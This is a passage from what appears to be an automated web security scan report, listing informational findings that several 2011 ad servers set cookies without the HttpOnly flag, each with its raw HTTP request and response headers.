Set-Cookie: rb="0:684339:20838240:uuid=4d97b063-cd55-fcc9-f79b-3dc3c331fd5b:0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0";Path=/;Domain=.adbrite.com;Expires=Fri, 08-Jul-2011 12:36:02 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;
6.42. http://ads.adbrite.com/adserver/vdi/712156  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/712156

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/vdi/712156?d=1iolb30nur9ak HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh38.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362046x0.743+1301786605x-1180381502"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMJKukoJSXm5aUWZYL1KdXWAgA%3D"; vsd=0@1@4d9d6e04@cti.w55c.net; rb=0:742697:20828160:4608069584519221037:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Sat, 09 Apr 2011 00:22:01 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: srh="1%3Aq64FAA%3D%3D";Path=/;Domain=.adbrite.com;Expires=Sun, 10-Apr-2011 00:22:01 GMT
Set-Cookie: vsd=0@1@4d9fa6a9@s7.addthis.com;Path=/;Domain=.adbrite.com;Expires=Mon, 11-Apr-2011 00:22:01 GMT
Set-Cookie: rb=0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0;Path=/;Domain=.adbrite.com;Expires=Fri, 08-Jul-2011 00:22:01 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;
6.43. http://ads.adbrite.com/adserver/vdi/742697  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/742697

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/vdi/742697?d=4608069584519221037 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4608069584519221037&mktid=&mpid=&fpid=-1&rnd=7441790688687410964&nu=n&sp=n
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362046x0.743+1301786605x-1180381502"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3Adqjd"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMLFicapSQCBdIKjLNAAjWGpfkGSjpKSYl5ealFmWDTlGprAQ%3D%3D"; fq="7xiqt%2C1uo0%7Cljdxnj%7Cljdxnp%2C86fx4%2C1uo0%7Cljdxno"; rb=0:682865:20838240:null:0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:762701:20861280:E3F32BD012B0974D052B68A20247663B:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Mon, 11 Apr 2011 16:41:21 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: srh="1%3Aq64FAA%3D%3D";Path=/;Domain=.adbrite.com;Expires=Tue, 12-Apr-2011 16:41:21 GMT
Set-Cookie: ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMJKukoJSXm5aUWZYL1KdXWAgA%3D";Path=/;Domain=.adbrite.com;Expires=Thu, 08-Apr-2021 16:41:21 GMT
Set-Cookie: vsd=0@1@4da32f31@cdn.turn.com;Path=/;Domain=.adbrite.com;Expires=Wed, 13-Apr-2011 16:41:21 GMT
Set-Cookie: fq=;Path=/;Domain=.adbrite.com;Expires=Mon, 11-Apr-2011 16:41:21 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;
6.44. http://ads.adbrite.com/adserver/vdi/762701  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/762701

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/vdi/762701?d=E3F32BD012B0974D052B68A20247663B HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362046x0.743+1301786605x-1180381502"; srh="1%3Aq64FAA%3D%3D"; rb=0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3Adqjd"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMLFicapSQCBdIKjLNAAjWGpfkGSjpKSYl5ealFmWDTlGprAQ%3D%3D"; vsd=0@3@4da052a5@www.wcax.com; fq="7xiqt%2C1uo0%7Cljdxnj%7Cljdxnp%2C86fx4%2C1uo0%7Cljdxno"

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Sat, 09 Apr 2011 12:35:50 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: vsd=0@4@4da052a6@www.wcax.com;Path=/;Domain=.adbrite.com;Expires=Mon, 11-Apr-2011 12:35:50 GMT
Set-Cookie: rb=0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:762701:20861280:E3F32BD012B0974D052B68A20247663B:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0;Path=/;Domain=.adbrite.com;Expires=Fri, 08-Jul-2011 12:35:50 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;
6.45. http://ads.adbrite.com/adserver/vdi/779045  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/779045

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/vdi/779045?d=37820808542507095 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362046x0.743+1301786605x-1180381502"; srh="1%3Aq64FAA%3D%3D"; rb=0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3Adqjd"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMLFicapSQCBdIKjLNAAjWGpfkGSjpKSYl5ealFmWDTlGprAQ%3D%3D"; vsd=0@1@4da0529f@www.wcax.com; fq="7xiqt%2C1uo0%7Cljdxnj"

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Sat, 09 Apr 2011 12:36:00 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: vsd=0@2@4da052b0@www.wcax.com;Path=/;Domain=.adbrite.com;Expires=Mon, 11-Apr-2011 12:36:00 GMT
Set-Cookie: rb=0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:779045:20861280:37820808542507095:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0;Path=/;Domain=.adbrite.com;Expires=Fri, 08-Jul-2011 12:36:00 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;
6.46. http://ads.financialcontent.com/www/delivery/afr.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.financialcontent.com
Path:   /www/delivery/afr.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /www/delivery/afr.php?n=fcad8083334&&zoneid=1311&cb=fcad8083334 HTTP/1.1
Host: ads.financialcontent.com
Proxy-Connection: keep-alive
Referer: http://studio-5.financialcontent.com/worldnow?Module=adbox_below
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:34:09 GMT
Server: Apache/2.2.16 (Debian) PHP/5.3.3-7+squeeze1 with Suhosin-Patch mod_ssl/2.2.16 OpenSSL/0.9.8o
X-Powered-By: PHP/5.3.3-7+squeeze1
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=61818d45a2dc1071204bb322fbeddac4; expires=Sun, 08-Apr-2012 12:34:09 GMT; path=/
Set-Cookie: OAVARS[fcad8083334]=a%3A2%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A3%3A%22509%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A4%3A%221311%22%3B%7D; path=/
Content-Length: 4781
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
6.47. http://ads.financialcontent.com/www/delivery/lg.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.financialcontent.com
Path:   /www/delivery/lg.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /www/delivery/lg.php?bannerid=509&campaignid=264&zoneid=1311&loc=1&referer=http%3A%2F%2Fstudio-5.financialcontent.com%2Fworldnow%3FModule%3Dadbox_below&cb=d0a8445283 HTTP/1.1
Host: ads.financialcontent.com
Proxy-Connection: keep-alive
Referer: http://ads.financialcontent.com/www/delivery/afr.php?n=fcad8083334&&zoneid=1311&cb=fcad8083334
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=104c48a8979640d0cf5e8eeec738404b; OAVARS[fcad8083334]=a%3A2%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A3%3A%22509%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A4%3A%221311%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:34:10 GMT
Server: Apache/2.2.16 (Debian) PHP/5.3.3-7+squeeze1 with Suhosin-Patch mod_ssl/2.2.16 OpenSSL/0.9.8o
X-Powered-By: PHP/5.3.3-7+squeeze1
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=104c48a8979640d0cf5e8eeec738404b; expires=Sun, 08-Apr-2012 12:34:10 GMT; path=/
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;
6.48. http://ads.pointroll.com/PortalServe/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /PortalServe/?pid=1190962H87920110119151326&cid=1424449&pos=h&redir=http://r.turn.com/r/formclick/id/WtKKC0F1UC834gsABwIBAA/url/$CTURL$&time=6|7:35|-5&r=0.8330807760357857&flash=10&server=polRedir HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 09 Apr 2011 12:36:11 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Content-type: text/html
Content-length: 8673
Set-Cookie:PRID=337572AE-A012-4FFC-8DD1-6EAB82E26D53; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRbu=EoHuWaH2p;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRvt=CBJBaEoHuWaH2pAIJBBe;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRgo=BBBAAsJvBBF-19!B;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=7BA00400-6896-A97D-0309-05A002090101; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AJcC*23172:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AJcCAGBk:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|EzpE:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|Fy8z:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|EzpEFy8z:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

<script language='javascript' src='http://spd.pointroll.com/PointRoll/Ads/prWriteCode.js'></script><script language='javascript'>var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=functi
...[SNIP]...
6.49. http://ads.revsci.net/adserver/ako  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?activate&csid=E05510 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.foxnews.com/politics/index.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=a8cd58cd77607ac5f39b5bbf5c533d34; rsiPus_0="MLuBM15WBV4EFlcCEVJFHBMURFBURJY9EVhHwEBWUhAaEsGQdh2fCjuxAnVgfF7gi69vaww5dGk="; NETSEGS_E05511=379226250c6302c7&E05511&0&4dc53ba8&0&&4d9fb2f3&00f8712b16a2747053422af6cef97d9a; NETSEGS_L09857=379226250c6302c7&L09857&0&4dc53c3d&0&&4d9fd0ee&00f8712b16a2747053422af6cef97d9a; NETSEGS_J06575=379226250c6302c7&J06575&0&4dc53c9e&0&&4d9fd931&00f8712b16a2747053422af6cef97d9a; NETSEGS_E05510=379226250c6302c7&E05510&0&4dc81472&0&&4da25a08&00f8712b16a2747053422af6cef97d9a; rsi_us_1000000=pUP1JU2jPhIc1A0uGehL84pPUbKzTkRplHTtDOLcFLL20Wt/xDozbuB9JMvwkAev2DUhq9kHuGUbrEuN8ON6TNG555znQzlM/5y3Of8x/X6dKg3FnSBBN+UlVxRdchaBGHVUKje4s8VkZQWjQ1gqgAwl+iH3n81oscO5chIWRZ36CXmDSa/OTIUw7CjGsrVH7jcNbZz1+P/5Cwum4IaWC0xqWyJ6XovDln8WaROkuTy33TUAHU61RJV5ivuxthgGJTnsGP2oim8WLMsNpJJA/LXcSgIXz4hNBUU9JAy7BvTu431M47rwgvXF1wwSs8CTVlcKnpNC+IZG/etg7wJ7v5WMpOoewDSPyl+D+ZITHQGpdDrmlVCTSuWtoRAk/fynI6itvIlfPCsB7ygRb9E+JbXqiTTZnEwFnkfcUSLpfgXJjDpEUtIjl0JADwIgGt00osG49t9IyNgiq4ztSgib+W2H7G4irTT7YqeFrKAKXiduq88e4SYI3XCR7PRqRGDSkcK7fP5pU4c4mWtpSGRpuZ/jQr+avXtESVqxm1F2x/dItR5K0ra7JZEPKK5ZdfMXYyC37FPztdunoZPk7PtuCqchU5n4be66l78i37EYOhAfDWUVKTiBXLEGa8OBYj5hoUrVcM75uopbp1ssdiEnTeE0OoyiUytxJOyUR0ZlVeXCl6VK+3+b7NaC+BUqdz1dLv+wtaIRVKaV4LStSk/n; rtc_TdTG=MLsv8yNKcQ5npbJrVs6vNkhIY6HjafGNqOTc1tAMxx8g2PSvwsElcsz7aCnYMEcFNWuyY0i34UZIUNjkLRgI9LkPCbfeH+KZCLxbrVb0tyqLkPb8grbjELIzOkhM53hlyrO5D+rL+JnaL3Hgz4n/P6OIeeLVXqjCnekSd+pnyoVrDjtw9TBr8CCVq4T37CwxL2fr9HC5Xyzve+JV52sLe5TX8Fq441fmYhKVTwiwXgDbgCpHT8aXQ5IlJz8y8fgLe4eNS6Fl53mI7GKBW+UlaUFSBuQbZhtcO3D2OBEnfLRmqWHt0EKaTNhYxr2/rohU9ox3fR+oZzRh5qRrNtPznHi15vGfiD2UUSPtQ2m9GBRVzh3VMLAzWpfHW1PVV8Y3VCYwGDyD8cYBXAEJ3Vd5rOHHwhBgfvfAAmitYuz1Iize51YbT9xVYpZfTNN+C8RpPYOW70eMODRYGng1A6swXECmgJNSt2kT2e0zp8sp4SIIim0M1qMchTiNAj+6qVH3UHnC6UtfizKH6aGCntAnR++9hA==; NETSEGS_F08747=379226250c6302c7&F08747&0&4dc8147b&0&&4d9fd802&00f8712b16a2747053422af6cef97d9a; rsi_segs_1000000=pUPF5kOBLwIMpzaxu2E2X52BOqEAEKTaYgYB7RmorjQ0sQ/Z0pMs/uNhWv9kDsM6I1OyNKGAI79hIwKvbOAlumXzgyuUaTFaCH+V4aSgqG2GMjvmS59xVuCAf4vueiYFNo9S72YpjYVEQ02rXdEHf5wlv+bSTNA6SWGQkpXPkeVMyYiNWDYjvLUPrW3poFL9bofizkV7I6ynO1TtYsgOwEMnIgbNsHH6nCwM0Kxbt46lR3orMFmVm/ydpkuxt43XF4gHS2Ma7Phd6W8DNhcci4KdRaug+fsZf4pNBQ6pH3QSZ3I3F+yd8CtC1RwwEMpzFrvbntG1S7ZEbg==; udm_0=MLvv9SUJaSpr557EdtIX6fE3HZxD2tVEbZaaSakC1Vtg80jsQpMZ82Rp4QDAVMIXzRVDE7hI/n/4akBaNcbN8GzvGBHbsQslcMTLNlRxc+ltcto7W3xwlydvz273pz0jQ4SVo42FUgVfwsuTJ73/ozLa5Dj4ttdtyx4ODj0c4MRgpOcHtrA9skVdsBvJxX6IA4P/mp6sWRYt1VtUyG21pdiMr6BE2SYIYkowggle26SPHtS97hgJom9QzF+fjkdopqa/eDqJ/hP21kuB7Nj/+t5E3SpclXlyj6NaRvJGIN17eN/umzN7wv+ezazt/lwqAWGvQUyaAiuB1TVylFtLbj7I0PdOEqjxsJKcOCJZ1JhXbmC1lZ6XChDbdUhU3t+YYwB//wiNi9Ld8batKsDYTWX0W6bmAEzQjeSWzUvtoONJgOSrqzLxsH3hcVyBsoM91FthCvWkrc0GDBVSVKzEww/Vo2msH1uIHBaQx3n9e13MpFHEYrkFOPjgbLG/rl8utHLnLWo971UO7HAZDcHPxOWByvPVoV7NG0dP25vYms68CezhpoXTWHnnVCE59stFSuvSrfAPWQ6FZGAe7Bjr9EcnT0FFDQQyTszjrf5QQlvbKIwEExhQMo10SGqH8E7rgEMNFS1sTmfkix3bXcdRC/4c17mQuMHwkssVmYY+3jS/LSNovgvkDf4Yy52ORyslLJ2KwcdH1HMx2WtoUSVh9tsdinADifa6eZOcI+g0oFmLUlkFggXnwMlgZpycv7iAIdiRqCzT2O7l4iJ7M9KxLjk1g4iCGD9d7Bnf8DlenBahcgWfsEGGIhs5S1kFpi2waCP7M7IujJgpjReKx1oUaC2n3sTgsAsWXiCGSqi2H+bXTiMMwsbJmmqfh868zK8DT+UO34iIPSUNvH+9LxJlBTM4zrgbRvxKmEfkoloEey8Su2LcC/4TDoX454zYkzghKdrM3/VDDSg+++jIzOmyR5H8EBbymNhwm7Cmao7CkbCQGVGV16kzTOLqS3tkquW5FO+I14XiU9MC7s+YlpQqTQVNzikypsQ4mMakObHYNqGm5smzfVuiZokZDMLmaJJ+zMjo6DR8oVkzbJ2cg0JXUK2spmVjvN0lBQ3ScDOssaW3dWwhnHwKlK+F52CFLZNUle4dDJXioVnhLAxZjivb1FLCoqz8bXtM5SEKXAk6zrOOICONbcEtivU=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_0="MLuBM15WBV4EFlcCEVJFHBMURFBURJY9EVhHwEBWUhAaEsGQdh2fCjuxAnXgmVDHz5HNAamBpCwgBedmjQ=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUPNOV2DdxIY1n3ioaH2BaM5+38g0fnq9IMs3Ssj976dqyMflzXndtQ/xCpjwkdl3jNjHIsSwidNVbPyQ8UukRlWAjzpgFu32Lh8TKovNuSMVT5zGqo+lVmsW02snStYmh6NVd6vQsWlMKLdx+mE2quPRxQw99QyHqQDKQmPTjX0IeU2BSj1d6aejeA2FSqM0oOtyZX/O2DScq9ciwmaexHpxuC3w/9hpURE0P7vbEXMP6qBRPf1ZS7Lkitm9khGEOewMOnllBWOlHOFGK43TM3FBJBRb/6qLcoC6gfW2xM4RivQvRRtikTJpufS1CInAw1no+zVmXZ2hTS6ONfIS1L7xA3elQ2eEN3P9aLspLwGIOLc4LwKaIjxEp7wbwhRcuvh+Onumpz1EcrdgPTf0xnSkxhfwzY2GYLXed45lhrR1joiovE7lKLUbTGz7+E1+YbvI8XZKmgeItShiLEr0yzF8A8nxh4PvIu9Cjo6s3qCFOY="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: application/x-javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 11 Apr 2011 16:31:14 GMT
Content-Length: 1207

function rsi_img(p,u,c){if(u.indexOf(location.protocol)==0){var i=new Image(2,3);if(c){i.onload=c;}
i.src=u;p[p.length]=i;}}
function rsi_simg(p,s,i){if(i<s.length){rsi_img(p,s[i],function(){rsi_sim
...[SNIP]...
6.50. http://ads2.adbrite.com/v0/ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads2.adbrite.com
Path:   /v0/ad

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /v0/ad?sid=640921&zs=3436385f3630&zx=69&zy=360&ww=1079&wh=1038&fl=1 HTTP/1.1
Host: ads2.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
